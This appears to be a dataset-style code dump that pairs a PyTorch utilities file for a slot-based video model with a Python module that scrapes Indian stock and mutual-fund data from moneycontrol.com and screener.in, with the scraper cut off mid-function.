torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm=5.)
# for each parameter, flatten and store
j = 0
for p in model.module.relational_dynamics.parameters():
if p.requires_grad:
grads[j] += [p.grad.view(-1)]
j += 1
if len(grads[0]) == aggregate_over:
print('aggregating at {}'.format(i))
for j,g in enumerate(grads):
all_grad = torch.stack(g).data.cpu().numpy() # [aggregate, dim]
logvargrads[j] += [np.mean(np.log(np.var(all_grad, 1)+1e-6))]
# reset
grads = [[] for i in range(num_grads)]
lvg_ = 0
for lvg in logvargrads:
lvg_ += np.mean(lvg)
lvg_ = lvg_ / len(logvargrads)
return lvg_
| 37.676471 | 144 | 0.609836 | import torch
import torch.nn.functional as F
from torch.nn import init
import numpy as np
from scipy.stats import truncnorm
def truncated_normal_initializer(shape, mean, stddev):
# compute threshold at 2 std devs
values = truncnorm.rvs(mean - 2 * stddev, mean + 2 * stddev, size=shape)
return torch.from_numpy(values).float()
def init_weights(net, init_type='normal', init_gain=0.02):
"""Initialize network weights.
Modified from: https://github.com/baudm/MONet-pytorch/blob/master/models/networks.py
Parameters:
net (network) -- network to be initialized
init_type (str) -- the name of an initialization method: normal | xavier | kaiming | orthogonal
init_gain (float) -- scaling factor for normal, xavier and orthogonal.
We use 'normal' in the original pix2pix and CycleGAN paper. But xavier and kaiming might
work better for some applications. Feel free to try yourself.
"""
def init_func(m): # define the initialization function
classname = m.__class__.__name__
if hasattr(m, 'weight') and (classname.find('Conv') != -1 or classname.find('Linear') != -1):
if init_type == 'normal':
init.normal_(m.weight.data, 0.0, init_gain)
elif init_type == 'xavier':
init.xavier_normal_(m.weight.data, gain=init_gain)
elif init_type == 'kaiming':
init.kaiming_normal_(m.weight.data, a=0, mode='fan_in')
elif init_type == 'orthogonal':
init.orthogonal_(m.weight.data, gain=init_gain)
elif init_type == 'truncated_normal':
m.weight.data = truncated_normal_initializer(m.weight.shape, 0.0, stddev=init_gain)
else:
raise NotImplementedError('initialization method [%s] is not implemented' % init_type)
if hasattr(m, 'bias') and m.bias is not None:
init.constant_(m.bias.data, 0.0)
elif classname.find('BatchNorm2d') != -1:
init.normal_(m.weight.data, 1.0, init_gain)
init.constant_(m.bias.data, 0.0)
net.apply(init_func)
def _softplus_to_std(softplus):
softplus = torch.min(softplus, torch.ones_like(softplus)*80)
return torch.sqrt(torch.log(1. + softplus.exp()) + 1e-5)
def mvn(loc, softplus, temperature=1.0):
return torch.distributions.independent.Independent(
torch.distributions.normal.Normal(loc, _softplus_to_std(softplus) * (1./temperature)), 1)
def std_mvn(shape, device):
loc = torch.zeros(shape).to(device)
scale = torch.ones(shape).to(device)
return torch.distributions.independent.Independent(
torch.distributions.normal.Normal(loc, scale), 1)
def gmm_loglikelihood(x_t, x_loc, log_var, mask_logprobs):
"""
mask_logprobs: [N, K, 1, H, W]
"""
# NLL [batch_size, 1, H, W]
sq_err = (x_t.unsqueeze(1) - x_loc).pow(2)
# log N(x; x_loc, log_var): [N, K, C, H, W]
normal_ll = -0.5 * log_var - 0.5 * (sq_err / torch.exp(log_var))
# [N, K, C, H, W]
log_p_k = (mask_logprobs + normal_ll)
# logsumexp over slots [N, C, H, W]
log_p = torch.logsumexp(log_p_k, dim=1)
# [batch_size]
nll = -torch.sum(log_p, dim=[1,2,3])
#upper_bound = torch.logsumexp(mask_logprobs - 0.5 * (sq_err / torch.exp(log_var)), dim=1) # [N, C, H, W]
#upper_bound = torch.sum(upper_bound, dim=[1,2,3]) # [N]
return nll, {'log_p_k': log_p_k, 'normal_ll': normal_ll, 'ub': None}
def gaussian_loglikelihood(x_t, x_loc, log_var):
sq_err = (x_t - x_loc).pow(2) # [N,C,H,W]
# log N(x; x_loc, log_var): [N,C, H, W]
normal_ll = -0.5 * log_var - 0.5 * (sq_err / torch.exp(log_var))
nll = -torch.sum(normal_ll, dim=[1,2,3]) # [N]
return nll
def create_video(means, masks, sum_over_k=True):
T = len(means)
frames = []
if len(means[0].shape) == 6:
k_dim = 2
else:
k_dim = 1
for i in range(T):
if sum_over_k:
frame = torch.sum(means[i].detach() * masks[i].detach(), k_dim) # [batch_size, rollouts, C, H, W]
else:
frame = (means[i] * masks[i]) + (1 - masks[i]) * torch.ones(means[i].shape).to(means[i].device)# [batch_size, rollouts, K, C, H, W]
frames += [frame]
video = torch.stack(frames) # [seq_len, batch_size, rollouts, [K], C, H, W]
return video
def rename_state_dict(state_dict, old_strings, new_strings):
new_state_dict = {}
for old_string, new_string in zip(old_strings, new_strings):
for k,v in state_dict.items():
if old_string in k:
new_key = k.replace(old_string, new_string)
new_state_dict[new_key] = v
for k,v in state_dict.items():
for old_string in old_strings:
if old_string in k:
break
else:
new_state_dict[k] = v
return new_state_dict
def get_log_var_grad(val_dataloader, model, geco, seq_len, aggregate_over=20):
"""
assume batch_size is 1, compu
"""
opt = torch.optim.SGD(model.parameters(), lr=1)
model.train()
num_grads = 0
for p in model.module.relational_dynamics.parameters():
if p.requires_grad:
num_grads += 1
grads = [[] for i in range(num_grads)]
logvargrads = [[] for i in range(num_grads)]
for i,batch in enumerate(val_dataloader):
imgs = batch['imgs'].to('cuda')
imgs = imgs[:,:seq_len]
model_outs = model(imgs, geco, i, None)
opt.zero_grad()
total_loss = model_outs['total_loss'] # [1] for sample size 1
total_loss.backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm=5.)
# for each parameter, flatten and store
j = 0
for p in model.module.relational_dynamics.parameters():
if p.requires_grad:
grads[j] += [p.grad.view(-1)]
j += 1
if len(grads[0]) == aggregate_over:
print('aggregating at {}'.format(i))
for j,g in enumerate(grads):
all_grad = torch.stack(g).data.cpu().numpy() # [aggregate, dim]
logvargrads[j] += [np.mean(np.log(np.var(all_grad, 1)+1e-6))]
# reset
grads = [[] for i in range(num_grads)]
lvg_ = 0
for lvg in logvargrads:
lvg_ += np.mean(lvg)
lvg_ = lvg_ / len(logvargrads)
return lvg_
| 3,183 | 0 | 187 |
18bbea310b3c36c11d394d4aa36ce9287ac2de2a | 49,201 | py | Python | data_science_utils/financial/__init__.py | krishnagorrepati/Data_science_utils | 15072ae11935800a5d0914b3ff0ccea11ffe4b73 | [
"MIT"
] | 70 | 2018-05-02T08:35:16.000Z | 2022-03-21T16:46:12.000Z | data_science_utils/financial/__init__.py | krishnagorrepati/Data_science_utils | 15072ae11935800a5d0914b3ff0ccea11ffe4b73 | [
"MIT"
] | 2 | 2019-06-28T00:19:04.000Z | 2020-07-28T14:04:09.000Z | data_science_utils/financial/__init__.py | krishnagorrepati/Data_science_utils | 15072ae11935800a5d0914b3ff0ccea11ffe4b73 | [
"MIT"
] | 75 | 2018-09-19T18:53:21.000Z | 2022-03-26T17:30:19.000Z | import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
from stockstats import StockDataFrame
import warnings
import traceback
warnings.filterwarnings('ignore')
import argparse
import re
import sys, os
sys.path.append(os.getcwd())
import os
import requests
from requests.exceptions import ConnectionError
import bs4
from bs4 import BeautifulSoup
from fastnumbers import isfloat
from fastnumbers import fast_float
from multiprocessing.dummy import Pool as ThreadPool
import more_itertools
from random import shuffle
import matplotlib.pyplot as plt
import seaborn as sns
from datetime import datetime
import json
import seaborn as sns
sns.set_style('whitegrid')
import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
import matplotlib as mplt
import matplotlib.pyplot as plt
from sklearn.model_selection import train_test_split
from sklearn.metrics import mean_squared_error
from sklearn.ensemble import RandomForestRegressor
from sklearn.metrics import explained_variance_score
from sklearn.preprocessing import LabelEncoder
from sklearn.metrics import confusion_matrix
from sklearn.model_selection import GridSearchCV
import matplotlib.dates as mdates
import seaborn as sns
import math
import gc
import ipaddress
from urllib.parse import urlparse
from sklearn.metrics import confusion_matrix
from sklearn.preprocessing import StandardScaler
from sklearn.neural_network import MLPClassifier
from data_science_utils import dataframe as df_utils
from data_science_utils import models as model_utils
from data_science_utils.dataframe import column as column_utils
from data_science_utils.models.IdentityScaler import IdentityScaler as IdentityScaler
from xgboost import XGBClassifier
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score
from sklearn.metrics import confusion_matrix,classification_report
import lightgbm as lgb
np.set_printoptions(threshold=np.nan)
import pickle
from xgboost import XGBClassifier
import xgboost as xgb
from sklearn.metrics import accuracy_score
import missingno as msno
from sklearn.metrics import f1_score
from sklearn.metrics import precision_score
from sklearn.metrics import recall_score
from sklearn.preprocessing import StandardScaler
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from sklearn import datasets
from sklearn.decomposition import PCA
import datetime
from scipy import signal
import matplotlib.pyplot as plt
from datetime import timedelta
from sklearn import linear_model
from sklearn.metrics import roc_auc_score
from IPython.display import display, HTML
import warnings
warnings.filterwarnings('ignore')
from data_science_utils.misc import ffloat
from data_science_utils.misc import is_dataframe
from data_science_utils.misc import ffloat_list
from data_science_utils.misc import remove_multiple_spaces
from datetime import date, timedelta
| 41.310663 | 202 | 0.647527 | import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
from stockstats import StockDataFrame
import warnings
import traceback
warnings.filterwarnings('ignore')
import argparse
import re
import sys, os
sys.path.append(os.getcwd())
import os
import requests
from requests.exceptions import ConnectionError
import bs4
from bs4 import BeautifulSoup
from fastnumbers import isfloat
from fastnumbers import fast_float
from multiprocessing.dummy import Pool as ThreadPool
import more_itertools
from random import shuffle
import matplotlib.pyplot as plt
import seaborn as sns
from datetime import datetime
import json
import seaborn as sns
sns.set_style('whitegrid')
import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
import matplotlib as mplt
import matplotlib.pyplot as plt
from sklearn.model_selection import train_test_split
from sklearn.metrics import mean_squared_error
from sklearn.ensemble import RandomForestRegressor
from sklearn.metrics import explained_variance_score
from sklearn.preprocessing import LabelEncoder
from sklearn.metrics import confusion_matrix
from sklearn.model_selection import GridSearchCV
import matplotlib.dates as mdates
import seaborn as sns
import math
import gc
import ipaddress
from urllib.parse import urlparse
from sklearn.metrics import confusion_matrix
from sklearn.preprocessing import StandardScaler
from sklearn.neural_network import MLPClassifier
from data_science_utils import dataframe as df_utils
from data_science_utils import models as model_utils
from data_science_utils.dataframe import column as column_utils
from data_science_utils.models.IdentityScaler import IdentityScaler as IdentityScaler
from xgboost import XGBClassifier
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score
from sklearn.metrics import confusion_matrix,classification_report
import lightgbm as lgb
np.set_printoptions(threshold=np.nan)
import pickle
from xgboost import XGBClassifier
import xgboost as xgb
from sklearn.metrics import accuracy_score
import missingno as msno
from sklearn.metrics import f1_score
from sklearn.metrics import precision_score
from sklearn.metrics import recall_score
from sklearn.preprocessing import StandardScaler
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from sklearn import datasets
from sklearn.decomposition import PCA
import datetime
from scipy import signal
import matplotlib.pyplot as plt
from datetime import timedelta
from sklearn import linear_model
from sklearn.metrics import roc_auc_score
from IPython.display import display, HTML
import warnings
warnings.filterwarnings('ignore')
from data_science_utils.misc import ffloat
from data_science_utils.misc import is_dataframe
from data_science_utils.misc import ffloat_list
from data_science_utils.misc import remove_multiple_spaces
from datetime import date, timedelta
def prev_weekday(adate):
if adate.weekday() <=4:
return adate
adate -= timedelta(days=1)
while adate.weekday() > 4: # Mon-Fri are 0-4
adate -= timedelta(days=1)
return adate
def get_ci(p,t,r):
return np.abs(np.fv(r/100,t,0,p))
def get_cumulative_amounts(p,t,r):
psum = p
for i in range(1,t):
psum = psum + get_ci(p,i,r)
return psum
def get_year_when_cumulative_profit_over_pe(pe,cpg):
if np.isnan(pe) or np.isnan(cpg):
return np.inf
for i in range(1,int(np.ceil(pe))):
if get_cumulative_amounts(1,i,cpg)>=pe:
return i
return int(np.ceil(pe))
def get_children(html_content):
return [item for item in html_content.children if type(item)==bs4.element.Tag or len(str(item).replace("\n","").strip())>0]
def get_portfolio(mfid):
url = "https://www.moneycontrol.com/india/mutualfunds/mfinfo/portfolio_holdings/" + mfid
page_response = requests.get(url, timeout=240)
page_content = BeautifulSoup(page_response.content, "html.parser")
portfolio_table = page_content.find('table', attrs={'class': 'tblporhd'})
fund_name = page_content.find('h1').text
return portfolio_table, fund_name
def get_table(portfolio_table):
portfolio_elems = get_children(portfolio_table)
table_data = list()
for row in portfolio_elems:
row_data = list()
row_elems = get_children(row)
for elem in row_elems:
text = elem.text.strip().replace("\n", "")
if len(text) == 0:
continue
elem_descriptor = {'text': text}
elem_children = get_children(elem)
if len(elem_children) > 0:
if elem_children[0].has_attr('href'):
elem_href = elem_children[0]['href']
elem_descriptor['href'] = elem_href
row_data.append(elem_descriptor)
table_data.append(row_data)
return table_data
def get_table_simple(portfolio_table, is_table_tag=True):
portfolio_elems = portfolio_table.find_all('tr') if is_table_tag else get_children(portfolio_table)
table_data = list()
for row in portfolio_elems:
row_data = list()
row_elems = get_children(row)
for elem in row_elems:
text = elem.text.strip().replace("\n", "")
text = remove_multiple_spaces(text)
if len(text) == 0:
continue
row_data.append(text)
table_data.append(row_data)
return table_data
def get_inner_texts_as_array(elem, filter_empty=True):
children = get_children(elem)
tarr = [child.text.strip().replace("\n", "") for child in children]
if filter_empty:
tarr = list(filter(lambda x: x is not None and len(x) > 0, tarr))
return tarr
def get_shareholding_pattern(shareholding_url):
page_response = requests.get(shareholding_url, timeout=240)
page_content = BeautifulSoup(page_response.content, "html.parser")
tables = page_content.find_all('table')
if len(tables) < 3:
return {}
table_content = page_content.find_all('table')[2]
rows = table_content.find_all('tr')
all_tds = page_content.find_all('td')
idx = list(map(lambda x: x.text, all_tds)).index("Total (A)+(B)+(C)")
promoters = get_inner_texts_as_array(
list(filter(lambda x: "Total shareholding of Promoter and Promoter Group (A)" in x.text, rows))[0],
filter_empty=False)
public = get_inner_texts_as_array(list(filter(lambda x: "Total Public shareholding (B)" in x.text, rows))[0],
filter_empty=False)
all_shares = get_inner_texts_as_array(
list(filter(lambda x: "Total (A)+(B)+(C)" in x.text, page_content.find_all('tr')))[0], filter_empty=False)
promoters_pledging = ffloat(promoters[7])
promoters = ffloat(promoters[5])
public = ffloat(public[5])
total_shares_count = ffloat(all_tds[idx + 2].text)
total_pledging = ffloat(all_tds[idx + 7].text)
return {"promoters": promoters, "public": public, "promoters_pledging": promoters_pledging,
"total_shares_count": total_shares_count, "total_pledging": total_pledging}
def get_fundholding_pattern(fundholding_url):
# Funds holding it or not Y
# Total funds holding currently N
# percent held by funds
# buys last quarter
# sells last quarter
# no change last quarter
# Total change in fund holding by money
# Total change in fund holding by percent shares
page_response = requests.get(fundholding_url, timeout=240)
page_content = BeautifulSoup(page_response.content, "html.parser")
results = {}
top_tab = page_content.text
# print(top_tab)
if "Not held by Mutual Funds in the last 6 quarters" in top_tab:
results['mf_holding'] = True
else:
results['mf_holding'] = False
bought = np.nan
sold = np.nan
hold = np.nan
if not results['mf_holding']:
bl = top_tab.split("Bought by")
if len(bl) == 2:
bought = ffloat(bl[1].strip().split(" ")[0])
sl = top_tab.split("Sold by")
if len(sl) == 2:
sold = ffloat(sl[1].strip().split(" ")[0])
hl = top_tab.split("No change in")
if len(hl) == 2:
hold = ffloat(hl[1].strip().split(" ")[0])
results['mf_bought'] = bought
results['mf_sold'] = sold
results['mf_hold'] = hold
six_quarter = page_content.find('div', attrs={'id': 'div_0'}).find('table', attrs={'class': 'tblfund2'}).find_all('tr')[-1]
six_quarter = ffloat_list(get_inner_texts_as_array(six_quarter)[1:])
results['mf_share_count'] = six_quarter[0]
results['mf_share_count_last_quarter_change'] = six_quarter[0] - six_quarter[1]
results['mf_six_quarter_share_count'] = six_quarter
return results
def get_ratios(url):
page_response = requests.get(url, timeout=240)
page_content = BeautifulSoup(page_response.content, "html.parser")
table_content = page_content.find_all('table', attrs={'class': 'table4'})[-1]
if "Data Not Available" in table_content.text:
return {}
dates_html = get_children(get_children(get_children(table_content)[0])[1])[1]
dates = get_inner_texts_as_array(dates_html)
ratios_htmls = get_children(get_children(get_children(get_children(table_content)[0])[1])[2])[1:]
rows = list(map(get_inner_texts_as_array, ratios_htmls))
ratios = {}
ratios['dates'] = dates
for row in rows:
if len(row) > 1:
ratios[row[0]] = ffloat_list(row[1:])
needed_keys = [('dates', 'ratios_dates'),
('Diluted EPS (Rs.)', 'ratios_diluted_eps'),
('Revenue from Operations/Share (Rs.)', 'ratios_revenue_per_share'),
('PBT/Share (Rs.)', 'ratios_pbt_per_share'),
('PBT Margin (%)', 'ratios_pbt_margin_per_share'),
('Total Debt/Equity (X)', 'ratios_de'),
('Asset Turnover Ratio (%)', 'ratios_asset_turnover_ratio'),
('Current Ratio (X)', 'ratios_cr'),
('EV/EBITDA (X)', 'ratios_ev_by_ebitda'),
('Price/BV (X)', 'ratios_pb'),
('MarketCap/Net Operating Revenue (X)','mcap/revenue'),
('Price/Net Operating Revenue','price/revenue')]
ratios = {your_key[1]: ratios[your_key[0]] if your_key[0] in ratios else [] for your_key in needed_keys}
return ratios
def get_min_and_three_year_from_screener(table):
min_value = np.inf
three_year_value = np.inf
for row in table:
if len(row)==2:
if row[0]=='3 Years:':
three_year_value = ffloat(row[1].replace('%',''))
cur_value = ffloat(row[1].replace('%',''))
min_value = min(min_value,cur_value)
return min_value,three_year_value
def get_quarterly_results(quarterly_results_table):
qrt = get_table_simple(quarterly_results_table)
qres = {}
qres['dates'] = qrt[0]
qres['sales'] = ffloat_list(qrt[1][1:])
qres['operating_profit'] = ffloat_list(qrt[3][1:])
qres['opm_percent'] = ffloat_list(qrt[4][1:])
qres['interest'] = ffloat_list(qrt[7][1:])
qres['pbt'] = ffloat_list(qrt[8][1:])
return qres
def get_annual_results(annual_results):
if annual_results is None:
return {}
qrt = get_table_simple(annual_results)
qres = {}
qres['dates'] = qrt[0]
qres['sales'] = ffloat_list(qrt[1][1:])
qres['operating_profit'] = ffloat_list(qrt[3][1:])
qres['opm_percent'] = ffloat_list(qrt[4][1:])
qres['interest'] = ffloat_list(qrt[6][1:])
qres['pbt'] = ffloat_list(qrt[8][1:])
qres['eps'] = ffloat_list(qrt[11][1:])
return qres
def get_balance_sheet(balance_sheet):
if balance_sheet is None:
return {}
qrt = get_table_simple(balance_sheet)
qres = {}
qres['dates'] = qrt[0]
qres['borrowings'] = ffloat_list(qrt[3][1:])
qres['fixed_assets'] = ffloat_list(qrt[6][1:])
qres['total_assets'] = ffloat_list(qrt[10][1:])
return qres
def get_cash_flows(cash_flows):
if cash_flows is None:
return {}
qrt = get_table_simple(cash_flows)
qres = {}
qres['dates'] = qrt[0]
qres['net_cash_flow'] = ffloat_list(qrt[4][1:])
return qres
def get_past_prices(sc_id):
bse_url = "https://www.moneycontrol.com/tech_charts/bse/his/%s.csv" % sc_id
nse_url = "https://www.moneycontrol.com/tech_charts/nse/his/%s.csv" % sc_id
past_prices_nse = pd.read_csv(nse_url, header=None, names=['open', 'high', 'low', 'close', 'volume', 1, 2, 3, 4])[
['open', 'high', 'low', 'close', 'volume']]
past_prices_nse.index = pd.to_datetime(past_prices_nse.index)
past_prices_bse = pd.read_csv(bse_url, header=None, names=['open', 'high', 'low', 'close', 'volume', 1, 2, 3, 4])[
['open', 'high', 'low', 'close', 'volume']]
past_prices_bse.index = pd.to_datetime(past_prices_bse.index)
ly = None
two_year_ago = None
three_year_ago = None
five_year_ago = None
past_prices = past_prices_bse
for i in range(12):
try:
if ly is None:
ly_t = pd.to_datetime(past_prices.iloc[-1:].index.values[0] - pd.to_timedelta(364 + i, unit='d'))
ly = past_prices.loc[[ly_t]]
if two_year_ago is None:
two_year_ago_t = pd.to_datetime(
past_prices.iloc[-1:].index.values[0] - pd.to_timedelta(730 + i, unit='d'))
two_year_ago = past_prices.loc[[two_year_ago_t]]
if three_year_ago is None:
three_year_ago_t = pd.to_datetime(
past_prices.iloc[-1:].index.values[0] - pd.to_timedelta(1095 + i, unit='d'))
three_year_ago = past_prices.loc[[three_year_ago_t]]
if five_year_ago is None:
five_year_ago_t = pd.to_datetime(
past_prices.iloc[-1:].index.values[0] - pd.to_timedelta(1825 + i, unit='d'))
five_year_ago = past_prices.loc[[five_year_ago_t]]
except Exception as e:
pass
past_prices = past_prices_nse
for i in range(12):
try:
if ly is None:
ly_t = pd.to_datetime(past_prices.iloc[-1:].index.values[0] - pd.to_timedelta(364 + i, unit='d'))
ly = past_prices.loc[[ly_t]]
if two_year_ago is None:
two_year_ago_t = pd.to_datetime(
past_prices.iloc[-1:].index.values[0] - pd.to_timedelta(730 + i, unit='d'))
two_year_ago = past_prices.loc[[two_year_ago_t]]
if three_year_ago is None:
three_year_ago_t = pd.to_datetime(
past_prices.iloc[-1:].index.values[0] - pd.to_timedelta(1095 + i, unit='d'))
three_year_ago = past_prices.loc[[three_year_ago_t]]
if five_year_ago is None:
five_year_ago_t = pd.to_datetime(
past_prices.iloc[-1:].index.values[0] - pd.to_timedelta(1825 + i, unit='d'))
five_year_ago = past_prices.loc[[five_year_ago_t]]
except Exception as e:
pass
if len(past_prices_nse) >= len(past_prices_bse):
past_prices = past_prices_nse
else:
past_prices = past_prices_bse
stock = StockDataFrame.retype(past_prices)
past_prices['rsi_15'] = stock['rsi_15']
past_prices['rsi_45'] = stock['rsi_45']
past_prices['rsi_75'] = stock['rsi_75']
past_prices['rsi_130'] = stock['rsi_130']
past_prices['boll_ub'] = stock['boll_ub']
past_prices['boll_lb'] = stock['boll_lb']
past_prices['boll_ub_gap'] = (past_prices['boll_lb'] - past_prices['close']) / past_prices['boll_lb']
past_prices['boll_lb_gap'] = (past_prices['close'] - past_prices['boll_ub']) / past_prices['boll_ub']
past_prices["weekly_change"] = past_prices[["close"]].rolling(6).agg({"close": lambda x: (x[-1] - x[0]) / x[0]})
past_prices["monthly_change"] = past_prices[["close"]].rolling(21).agg({"close": lambda x: (x[-1] - x[0]) / x[0]})
past_prices["3m_change"] = past_prices[["close"]].rolling(65).agg({"close": lambda x: (x[-1] - x[0]) / x[0]})
past_prices["6m_change"] = past_prices[["close"]].rolling(130).agg({"close": lambda x: (x[-1] - x[0]) / x[0]})
past_prices["ewm_7_close"] = past_prices['close'].ewm(span=7).mean()
past_prices["ewm_30_close"] = past_prices['close'].ewm(span=30).mean()
past_prices["ewm_120_close"] = past_prices['close'].ewm(span=120).mean()
past_prices["ewm_7_close_diff"] = (past_prices['close'] - past_prices["ewm_7_close"]) / past_prices["ewm_7_close"]
past_prices["ewm_30_close_diff"] = (past_prices['close'] - past_prices["ewm_30_close"]) / past_prices["ewm_30_close"]
past_prices["ewm_120_close_diff"] = (past_prices['close'] - past_prices["ewm_120_close"]) / past_prices["ewm_120_close"]
past_prices["std_7_close"] = past_prices['close'].ewm(span=7).std()
past_prices["std_30_close"] = past_prices['close'].ewm(span=30).std()
past_prices["std_120_close"] = past_prices['close'].ewm(span=120).std()
past_prices["ewm_7_volume"] = past_prices['volume'].ewm(span=7).mean()
past_prices["ewm_30_volume"] = past_prices['volume'].ewm(span=30).mean()
past_prices["ewm_120_volume"] = past_prices['volume'].ewm(span=120).mean()
past_prices["ewm_7_volume_diff"] = (past_prices['volume'] - past_prices["ewm_7_volume"]) / past_prices["ewm_7_volume"]
past_prices["ewm_30_volume_diff"] = (past_prices['volume'] - past_prices["ewm_30_volume"]) / past_prices["ewm_30_volume"]
past_prices["ewm_120_volume_diff"] = (past_prices['volume'] - past_prices["ewm_120_volume"]) / past_prices["ewm_120_volume"]
past_prices["std_7_volume"] = past_prices['volume'].ewm(span=7).std()
past_prices["std_30_volume"] = past_prices['volume'].ewm(span=30).std()
past_prices["std_120_volume"] = past_prices['volume'].ewm(span=120).std()
past_prices.fillna(0, inplace=True)
df_utils.drop_columns_safely(past_prices, ["close_-1_d", 'close_-1_s', 'rs_45', 'rs_15', 'close_20_sma', 'close_20_mstd',
'boll'], inplace=True)
res = {"all_past_prices": past_prices, "last_year": ly, "two_year_ago": two_year_ago,
"three_year_ago": three_year_ago, "five_year_ago": five_year_ago}
return res
def get_scrip_info(url):
original_url = url
key_val_pairs = {}
key_val_pairs["original_url"] = original_url
if not url.startswith("http"):
url = "https://www.moneycontrol.com" + url
try:
page_response = requests.get(url, timeout=240)
if page_response.status_code > 299:
print("Failed to fetch: %s" % url)
page_response = requests.get(url, timeout=240)
page_content = BeautifulSoup(page_response.content, "html.parser")
scrip_name = None
name_divs = page_content.find_all('div', attrs={'class': 'gry10'})
for nd in name_divs:
texts = list(map(lambda x: x.strip(), nd.text.split(" ")))
if "NSE:" in texts:
scrip_name = texts[texts.index("NSE:") + 1]
scrip_name = re.sub('[^0-9a-zA-Z&\-]+', '', scrip_name)
if scrip_name is None or len(scrip_name.strip()) == 0 or "ETF" in scrip_name:
key_val_pairs['failure'] = True
key_val_pairs['err'] = "%s is not named on NSE" % url
# print(key_val_pairs['err'])
return key_val_pairs
content_div_text = page_content.find('div', attrs={'id': 'content_full'}).text
if "not listed" in content_div_text or "not traded" in content_div_text:
key_val_pairs['failure'] = True
key_val_pairs['err'] = "%s is not listed on both BSE and NSE" % url
# print(key_val_pairs['err'])
return key_val_pairs
price = ffloat(page_content.find('div', attrs={'id': 'Nse_Prc_tick_div'}).text.split(" ")[0].replace(',', ''))
low = ffloat(page_content.find('span', attrs={'id': 'b_low_sh'}).text.split(" ")[0])
high = ffloat(page_content.find('span', attrs={'id': 'b_high_sh'}).text.split(" ")[0])
open_price = ffloat(page_content.find('div', attrs={'id': 'n_open'}).text.split(" ")[0].replace(',', ''))
today_change = page_content.find('div',attrs={'id':'n_changetext'}).text.strip().split(" ")
today_change_value = ffloat(today_change[0])
today_change_percent = ffloat(today_change[1])
name = page_content.find('h1', attrs={'class': 'company_name'}).text
screener_url = "https://www.screener.in/company/%s/" % scrip_name
screener_page_response = requests.get(screener_url, timeout=240)
if screener_page_response.status_code > 299:
key_val_pairs['failure'] = True
key_val_pairs['err'] = "No Screener URL: %s" % screener_url
# print(key_val_pairs['err'])
return key_val_pairs
screener_page_content = BeautifulSoup(screener_page_response.content, "html.parser")
screener_name = \
get_children(get_children(screener_page_content.find('nav', attrs={'id': 'fixed-scroll-aid-bar'}))[0])[
0].text.strip()
sector = get_children(screener_page_content.find('h1'))[0].text.replace("/", '').strip()
yearly_high = page_content.find('span', attrs={'id': 'n_52high'}).text.strip()
yearly_low = page_content.find('span', attrs={'id': 'n_52low'}).text.strip()
html_data_content = page_content.find('div', attrs={'id': 'mktdet_1'})
petable = get_table(get_children(html_data_content)[0])
pbtable = get_table(get_children(html_data_content)[1])
dma_table = get_table_simple(page_content.find('div', attrs={'id': 'acc_hd2'}).find_all('table')[2])
# print(dma_table)
thirty_dma = None
fifty_dma = None
one_fifty_dma = None
two_hundred_dma = None
if len(dma_table[1]) > 1:
thirty_dma = dma_table[1][1]
if len(dma_table[2]) > 1:
fifty_dma = dma_table[2][1]
if len(dma_table[3]) > 1:
one_fifty_dma = dma_table[3][1]
if len(dma_table[4]) > 1:
two_hundred_dma = dma_table[4][1]
side_nav = page_content.find('dl', attrs={'id': 'slider'})
ratio_url = side_nav.find_all('dd')[2].find_all('a')[7]['href']
ratio_url = "https://www.moneycontrol.com" + ratio_url
ratios = get_ratios(ratio_url)
volume = ffloat(page_content.find('span', attrs={'id': 'nse_volume'}).text)
sc_id = page_content.find('input', attrs={'id': 'sc_id'}).get('value').lower()
mf_url = "https://www.moneycontrol.com/mf/user_scheme/mfholddetail_sec.php?sc_did=%s" % sc_id
shareholding_url = "https://www.moneycontrol.com" + side_nav.find_all('dd')[4].find_all('a')[0]['href']
shareholdings = get_shareholding_pattern(shareholding_url)
mfs = get_fundholding_pattern(mf_url)
key_val_pairs = {**key_val_pairs, **mfs, **shareholdings, **ratios}
past_prices = get_past_prices(sc_id)
l_yp = None
two_yp = None
three_yp = None
five_yp = None
gain_loss_l_yp = None
gain_loss_two_yp = None
gain_loss_three_yp = None
gain_loss_five_yp = None
if is_dataframe(past_prices['last_year']):
l_yp = past_prices['last_year']['close'].values[0]
gain_loss_l_yp = (price - l_yp) * 100 / l_yp
if is_dataframe(past_prices['two_year_ago']):
two_yp = past_prices['two_year_ago']['close'].values[0]
gain_loss_two_yp = (price - two_yp) * 100 / two_yp
if is_dataframe(past_prices['three_year_ago']):
three_yp = past_prices['three_year_ago']['close'].values[0]
gain_loss_three_yp = (price - three_yp) * 100 / three_yp
if is_dataframe(past_prices['five_year_ago']):
five_yp = past_prices['five_year_ago']['close'].values[0]
gain_loss_five_yp = (price - five_yp) * 100 / five_yp
quarterly_results = get_quarterly_results(
screener_page_content.find('section', attrs={'id': 'quarters'}).find('table'))
annual_results_table = screener_page_content.find('section', attrs={'id': 'profit-loss'}).find('table', attrs={
'class': 'data-table'})
annual_results = None
if annual_results_table is not None:
annual_results = get_annual_results(annual_results_table)
csg_table = get_table_simple(
screener_page_content.find('section', attrs={'id': 'profit-loss'}).find_all('table', attrs={
'class': 'ranges-table'})[0])
min_csg, three_year_csg = get_min_and_three_year_from_screener(csg_table)
cpg_table = get_table_simple(
screener_page_content.find('section', attrs={'id': 'profit-loss'}).find_all('table', attrs={
'class': 'ranges-table'})[1])
min_cpg, three_year_cpg = get_min_and_three_year_from_screener(cpg_table)
roe_table = get_table_simple(
screener_page_content.find('section', attrs={'id': 'profit-loss'}).find_all('table', attrs={
'class': 'ranges-table'})[2])
min_roe, three_year_roe = get_min_and_three_year_from_screener(roe_table)
balance_sheet = get_balance_sheet(
screener_page_content.find('section', attrs={'id': 'balance-sheet'}).find('table'))
cash_flows = get_cash_flows(screener_page_content.find('section', attrs={'id': 'cash-flow'}).find('table'))
data_table = list()
data_table.extend(petable)
data_table.extend(pbtable)
